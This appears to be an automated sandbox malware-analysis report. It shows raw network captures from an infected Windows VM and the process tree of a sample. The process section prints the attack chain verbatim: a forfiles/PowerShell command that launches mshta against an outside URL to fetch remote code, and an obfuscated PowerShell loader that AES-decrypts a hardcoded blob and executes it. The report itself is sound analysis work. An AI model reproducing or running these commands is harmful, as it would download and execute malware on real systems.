                                                                                                                                                                                                                  2024-12-18 20:06:25 UTC8192INData Raw: 4f 14 e9 bb 24 86 fa f4 3a 10 73 4b 80 d5 13 35 19 cd 6c 3e 61 5b 1b b1 4d 74 a5 5a 77 34 ef 62 48 71 8a 55 a7 d2 62 9d ee 03 94 52 37 14 29 a5 eb 40 11 b0 a3 da 9d 8c d1 b6 ab 98 04 fe 2a 72 1c 50 06 da 72 8a 1b 24 7a f3 4b 4d 5a 75 45 8d 14 86 91 ba 9a c2 a4 6a 6d 52 21 8c c5 2d 49 cd 36 98 58 6d 1b 69 d4 52 b8 86 ed a4 61 52 f3 49 8a 60 33 6d 1b 6a 45 53 4f 11 13 4a e0 42 a2 9f cd 4e b6 e4 d4 b1 59 3b 54 f3 21 d9 94 96 9f 57 16 c9 ea 54 b2 fe f5 27 28 94 a2 ca 1b 09 e9 4d f2 cf f7 6b 5d 2d 69 5a d4 54 fb 44 5f 23 68 c8 58 8d 29 8b d2 b4 fe cb 8a 6b c0 76 d3 e7 44 f2 33 2d d0 8a 6a a1 ab cd 16 39 a6 2a 83 54 a4 43 4d 15 76 53 58 55 a9 b8 56 aa 99 ab 52 b9 36 1d b4 54 4e 86 a4 f3 01 eb 4d 69 07 4a 77 62 b2 2a 4c a7 76 6a bb a1 15 79 be 7e 94 d6 84 7e 35
                                                                                                                                                                                                                  Data Ascii: O$:sK5l>a[MtZw4bHqUbR7)@*rPr$zKMZuEjmR!-I6XmiRaRI`3mjESOJBNY;T!WT'(Mk]-iZTD_#hX)kvD3-j9*TCMvSXUVR6TNMiJwb*Lvjy~~5
                                                                                                                                                                                                                  2024-12-18 20:06:25 UTC8192INData Raw: a7 8f 8a 77 94 6e ce 1f c2 f7 2d 6f ac 62 e1 77 2f 4f 32 ba 2f 12 ea ba 75 a1 56 b9 be c8 65 f9 60 8b ef b7 d7 d2 ae 5c 69 f6 eb 6e 45 bd b2 b1 f5 ae 4f 58 d1 01 d4 bc c9 63 6d ac 9f 2f d6 b3 97 3d 24 d3 d9 9b 46 54 b1 35 14 ef 6b 7f 5f 22 13 e2 97 56 3f 60 81 a3 05 bf 89 aa 44 f1 16 b3 2e 48 b9 d8 0f 64 e0 55 28 f4 b2 24 c4 6a d8 5a b9 05 83 2a e4 2f 15 cb 2a 96 f8 6e 7a 3e ca 82 dd 26 24 37 d7 a6 eb ce 79 e5 76 f7 6a db d2 f5 cb 8f 3b 69 56 6d dc 1a a9 63 a5 b4 bb 70 b5 bf a6 e8 42 36 59 7b d5 61 e1 5e 72 bd 33 8f 17 5b 0a 95 a4 8a ba b3 4f 3e d0 77 22 d6 25 c5 98 dc c4 2f 15 db c9 a7 34 b1 a8 32 63 14 c3 a3 40 7e f3 64 d7 75 5c b3 11 51 dd 23 82 8e 61 0a 4a c7 03 25 b6 2a 06 b5 ae e6 fb c3 e0 af ee b9 a8 61 f0 de 17 f7 8c ac 7f d9 ae 3f ec fc 54 65 6e
                                                                                                                                                                                                                  Data Ascii: wn-obw/O2/uVe`\inEOXcm/=$FT5k_"V?`D.HdU($jZ*/*nz>&$7yvj;iVmcpB6Y{a^r3[O>w"%/42c@~du\Q#aJ%*a?Ten
                                                                                                                                                                                                                  2024-12-18 20:06:25 UTC8192INData Raw: 8f 69 20 ea b4 25 a1 2b f7 69 f3 45 85 99 9d 72 d2 49 c1 aa 93 5b 48 cb c5 74 51 d8 83 d5 69 cb 60 9d e8 55 a3 11 ba 6d ab b3 8d b8 d2 27 93 f8 b8 a8 ff 00 b0 67 ae c9 ed 00 6e 29 56 d3 3f c5 5b 7d 76 48 c9 e1 20 dd d9 cb 5a e9 92 43 56 64 86 51 1e 05 6e 3d a1 15 1b 5b e3 aa d4 fd 61 c9 dd 96 a8 45 2b 23 9c 92 ca 5e bf c5 4c 6b 29 0a e2 ba 37 81 0f 15 03 5a 90 dc 35 6b 1c 43 33 95 04 73 eb 63 3a 37 0b c5 4b f6 27 2b cd 6e a5 b2 0e b4 92 46 3a 05 ab fa d4 99 0b 0d 1b 18 0d 66 47 1d e9 ad 6d 20 ad bf 20 0f ba b4 9e 49 db ca d5 fd 61 99 fd 5d 18 8d 6c e7 f8 6a 26 b2 73 fc 35 bd 1c 05 db 69 5a b9 1d 86 57 3b 69 fd 66 c2 fa bd ce 44 e9 65 bf 86 9b fd 8c ed c0 4a ee 21 d3 c6 df bb 53 c7 a7 81 53 f5 e6 8a 58 18 9e 71 73 a2 4a 3f 86 aa 49 a0 cf d7 6e da f5 5f ec
                                                                                                                                                                                                                  Data Ascii: i %+iErI[HtQi`Um'gn)V?[}vH ZCVdQn=[aE+#^Lk)7Z5kC3sc:7K'+nF:fGm Ia]lj&s5iZW;ifDeJ!SSXqsJ?In_
                                                                                                                                                                                                                  2024-12-18 20:06:25 UTC8192INData Raw: 6b fb 9f f5 a7 fb cb d2 b0 1e ec c9 33 4b dd 9b 35 86 b7 59 fe 2a 9d 67 a9 c4 57 ad 55 a7 37 7b 1a d2 cb e9 d2 4f 95 1b f6 77 0a d3 2a 96 da 33 5d 25 b6 a7 66 21 c7 cc 02 f6 35 c1 d9 dc 62 64 3b b6 d6 c4 c8 ca 9e 62 36 e5 3f 7a 9e 1b 17 52 83 6e 27 16 2f 07 19 49 26 75 49 a9 59 9d d8 6f bb 4b 16 a1 68 f6 e6 46 6c 6d ed 5c a2 17 3c 6e e2 9b 71 70 f0 b7 b3 57 7c 73 aa d1 5a a5 6f 43 8f fb 3a 0d d9 33 a4 7b 89 e6 8f cc 8a 4f 2b 9e 37 7f 4a ab 1e a1 a8 47 33 09 7c b9 14 77 18 15 cf ad f4 8d 22 87 91 95 7f bb fd 2a dc d6 19 55 94 5c 32 16 fe 1e b5 ca f1 f5 65 ac 5b bf a9 a7 d5 21 0d 27 6d 7c 8d 2d 42 e6 4b b5 f3 07 ee 95 38 f9 9a a8 d9 ea c2 d3 e5 93 e7 0c df 37 fb 35 17 d8 e4 da 44 97 0c db bf 1a 2d f4 98 7c dd ec cc de d5 84 eb 55 9c f9 d6 e6 b1 a7 42 30 71
                                                                                                                                                                                                                  Data Ascii: k3K5Y*gWU7{Ow*3]%f!5bd;b6?zRn'/I&uIYoKhFlm\<nqpW|sZoC:3{O+7JG3|w"*U\2e[!'m|-BK875D-|UB0q


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 49812 | 150.171.28.10 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:06:25 UTC | 346 | OUT | GET /th?id=OADD2.10239340418548_1UEU8RPM3S7H7G0D8&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Host: tse1.mm.bing.net
Connection: Keep-Alive
2024-12-18 20:06:25 UTC | 856 | IN | HTTP/1.1 200 OK
Cache-Control: public, max-age=2592000
Content-Length: 458468
Content-Type: image/jpeg
X-Cache: TCP_HIT
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: D6BB61A66E1249EB9C52B90470557480 Ref B: EWR311000108049 Ref C: 2024-12-18T20:06:25Z
Date: Wed, 18 Dec 2024 20:06:24 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
19 | 192.168.2.6 | 49820 | 20.198.118.190 | 443
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                  2024-12-18 20:06:28 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4b 6f 44 7a 4a 73 38 6b 59 30 53 58 76 71 55 71 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 38 34 33 36 64 38 64 61 35 63 33 61 39 64 37 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: CNT 1 CON 305MS-CV: KoDzJs8kY0SXvqUq.1Context: d8436d8da5c3a9d7
2024-12-18 20:06:28 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-18 20:06:28 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: KoDzJs8kY0SXvqUq.2Context: d8436d8da5c3a9d7<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUFySn1Hj0cfrKgSxLPib7aTroKBc+msWBG4BCqodc+CubwccabNfAUF6ATiyJkX5aS85gP+6lrjsjHG5+2MJuRJaR55Gi40kx7iq7iJdmT+lz
2024-12-18 20:06:28 UTC | 74 | OUT | Data Ascii: BND 3 CON\QOS 56MS-CV: KoDzJs8kY0SXvqUq.3Context: d8436d8da5c3a9d7
2024-12-18 20:06:28 UTC | 14 | IN | Data Ascii: 202 1 CON 58
2024-12-18 20:06:28 UTC | 58 | IN | Data Ascii: MS-CV: 2/Y4IQcMC0SUpPJF2eXoww.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port
20 | 192.168.2.6 | 49837 | 20.198.118.190 | 443

Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:06:32 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: gbrcWBGgC0mMT+Sl.1Context: 1c1c6dfc9168e126
2024-12-18 20:06:32 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-18 20:06:32 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: gbrcWBGgC0mMT+Sl.2Context: 1c1c6dfc9168e126<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUFySn1Hj0cfrKgSxLPib7aTroKBc+msWBG4BCqodc+CubwccabNfAUF6ATiyJkX5aS85gP+6lrjsjHG5+2MJuRJaR55Gi40kx7iq7iJdmT+lz
2024-12-18 20:06:32 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: gbrcWBGgC0mMT+Sl.3Context: 1c1c6dfc9168e126<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-18 20:06:32 UTC | 14 | IN | Data Ascii: 202 1 CON 58
2024-12-18 20:06:32 UTC | 58 | IN | Data Ascii: MS-CV: zbnK0gwuTEm/8/JXwoMjjw.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port
21 | 192.168.2.6 | 49869 | 20.198.118.190 | 443

Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:06:46 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: DmXKN/e26ky8k9ex.1Context: caeb82f6b7f8e323
2024-12-18 20:06:46 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-18 20:06:46 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: DmXKN/e26ky8k9ex.2Context: caeb82f6b7f8e323<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUFySn1Hj0cfrKgSxLPib7aTroKBc+msWBG4BCqodc+CubwccabNfAUF6ATiyJkX5aS85gP+6lrjsjHG5+2MJuRJaR55Gi40kx7iq7iJdmT+lz
2024-12-18 20:06:46 UTC | 74 | OUT | Data Ascii: BND 3 CON\QOS 56MS-CV: DmXKN/e26ky8k9ex.3Context: caeb82f6b7f8e323
2024-12-18 20:06:47 UTC | 14 | IN | Data Ascii: 202 1 CON 58
2024-12-18 20:06:47 UTC | 58 | IN | Data Ascii: MS-CV: GcfvSqZ16km5iplKjOhH/A.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port
22 | 192.168.2.6 | 49920 | 20.198.118.190 | 443

Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:07:08 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: 8bsPdm7Cw0mz/2ec.1Context: a4ce2a26d3695761
2024-12-18 20:07:08 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-18 20:07:08 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 8bsPdm7Cw0mz/2ec.2Context: a4ce2a26d3695761<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUFySn1Hj0cfrKgSxLPib7aTroKBc+msWBG4BCqodc+CubwccabNfAUF6ATiyJkX5aS85gP+6lrjsjHG5+2MJuRJaR55Gi40kx7iq7iJdmT+lz
2024-12-18 20:07:08 UTC | 74 | OUT | Data Ascii: BND 3 CON\QOS 56MS-CV: 8bsPdm7Cw0mz/2ec.3Context: a4ce2a26d3695761
2024-12-18 20:07:08 UTC | 14 | IN | Data Ascii: 202 1 CON 58
2024-12-18 20:07:08 UTC | 58 | IN | Data Ascii: MS-CV: VVoUC3fiNUi/5Dsru7KVIg.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port
23 | 192.168.2.6 | 49926 | 20.198.118.190 | 443

Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:07:10 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: cTMMtSDjcUuDhIG5.1Context: 2af87a103066e798
2024-12-18 20:07:10 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-18 20:07:10 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: cTMMtSDjcUuDhIG5.2Context: 2af87a103066e798<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUFySn1Hj0cfrKgSxLPib7aTroKBc+msWBG4BCqodc+CubwccabNfAUF6ATiyJkX5aS85gP+6lrjsjHG5+2MJuRJaR55Gi40kx7iq7iJdmT+lz
2024-12-18 20:07:10 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: cTMMtSDjcUuDhIG5.3Context: 2af87a103066e798<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-18 20:07:11 UTC | 14 | IN | Data Ascii: 202 1 CON 58
2024-12-18 20:07:11 UTC | 58 | IN | Data Ascii: MS-CV: a14oT4gGYkONdD+51MciPw.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port
24 | 192.168.2.6 | 49982 | 20.198.118.190 | 443

Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:07:34 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: nj7gbN9VLUqi6pUc.1Context: 728631bfc1e6970a
2024-12-18 20:07:34 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-18 20:07:34 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: nj7gbN9VLUqi6pUc.2Context: 728631bfc1e6970a<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUFySn1Hj0cfrKgSxLPib7aTroKBc+msWBG4BCqodc+CubwccabNfAUF6ATiyJkX5aS85gP+6lrjsjHG5+2MJuRJaR55Gi40kx7iq7iJdmT+lz
2024-12-18 20:07:34 UTC | 74 | OUT | Data Ascii: BND 3 CON\QOS 56MS-CV: nj7gbN9VLUqi6pUc.3Context: 728631bfc1e6970a
                                                                                                                                                                                                                  2024-12-18 20:07:35 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                  Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                  2024-12-18 20:07:35 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6a 6b 44 41 37 64 35 30 67 30 32 7a 76 71 71 71 2f 4d 37 39 62 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                  Data Ascii: MS-CV: jkDA7d50g02zvqqq/M79bA.0Payload parsing failed.


Session ID:25
Source IP:192.168.2.6
Source Port:50044
Destination IP:20.198.119.143
Destination Port:443

Timestamp:2024-12-18 20:08:01 UTC
Bytes transferred:71
Direction:OUT
Data Ascii:
CNT 1 CON 305
MS-CV: u58YlpvF+U6f1GKP.1
Context: 1f130a7bcbefca6c

Timestamp:2024-12-18 20:08:01 UTC
Bytes transferred:249
Direction:OUT
Data Ascii:
<connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>

Timestamp:2024-12-18 20:08:01 UTC
Bytes transferred:1084
Direction:OUT
Data Ascii:
ATH 2 CON\DEVICE 1061
MS-CV: u58YlpvF+U6f1GKP.2
Context: 1f130a7bcbefca6c

<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUFySn1Hj0cfrKgSxLPib7aTroKBc+msWBG4BCqodc+CubwccabNfAUF6ATiyJkX5aS85gP+6lrjsjHG5+2MJuRJaR55Gi40kx7iq7iJdmT+lz

Timestamp:2024-12-18 20:08:01 UTC
Bytes transferred:74
Direction:OUT
Data Ascii:
BND 3 CON\QOS 56
MS-CV: u58YlpvF+U6f1GKP.3
Context: 1f130a7bcbefca6c

Timestamp:2024-12-18 20:08:02 UTC
Bytes transferred:14
Direction:IN
Data Ascii:
202 1 CON 58

Timestamp:2024-12-18 20:08:02 UTC
Bytes transferred:58
Direction:IN
Data Ascii:
MS-CV: QWvFIZelS06y4XXjCR2wFQ.0

Payload parsing failed.



                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                  Start time:15:05:56
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\forfiles.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/FILEANH
                                                                                                                                                                                                                  Imagebase:0x7ff706130000
                                                                                                                                                                                                                  File size:52'224 bytes
                                                                                                                                                                                                                  MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                  Start time:15:05:56
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                  Start time:15:05:56
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:. \*i*\*2\msh*e https://tiffany-careers.com/FILEANH
                                                                                                                                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                  Start time:15:05:58
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\mshta.exe" https://tiffany-careers.com/FILEANH
                                                                                                                                                                                                                  Imagebase:0x7ff635a40000
                                                                                                                                                                                                                  File size:14'848 bytes
                                                                                                                                                                                                                  MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                  Start time:15:06:01
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                  Imagebase:0x7ff7403e0000
                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                  Start time:15:06:02
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($pzaMyJg){return -split ($pzaMyJg -replace '..', '0x$& ')};$KUtXL = clean[...]iqxjTB = [System.Security.Cryptography.Aes]::Create();$IiqxjTB.Key = clean('747464414A50546B43514F4F4B7A5077');$IiqxjTB.IV = New-Object byte[] 16;$UdJKkrroG = $IiqxjTB.CreateDecryptor();$mhREwMEES = [Text.Encoding]::UTF8.GetString($UdJKkrroG.TransformFinalBlock($KUtXL, 0,$KUtXL.Length)); & $mhREwMEES.Substring(0,3) $mhREwMEES.Substring(3)
                                                                                                                                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                  Start time:15:06:02
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                  Start time:15:06:07
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\user\AppData\Roaming\New_2025.webp
                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                  Start time:15:06:07
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=2208,i,10322920844416449254,4510193414776535849,262144 /prefetch:3
                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                  Start time:15:06:07
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate --single-argument C:\Users\user\AppData\Roaming\New_2025.webp
                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                  Start time:15:06:08
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:3
                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
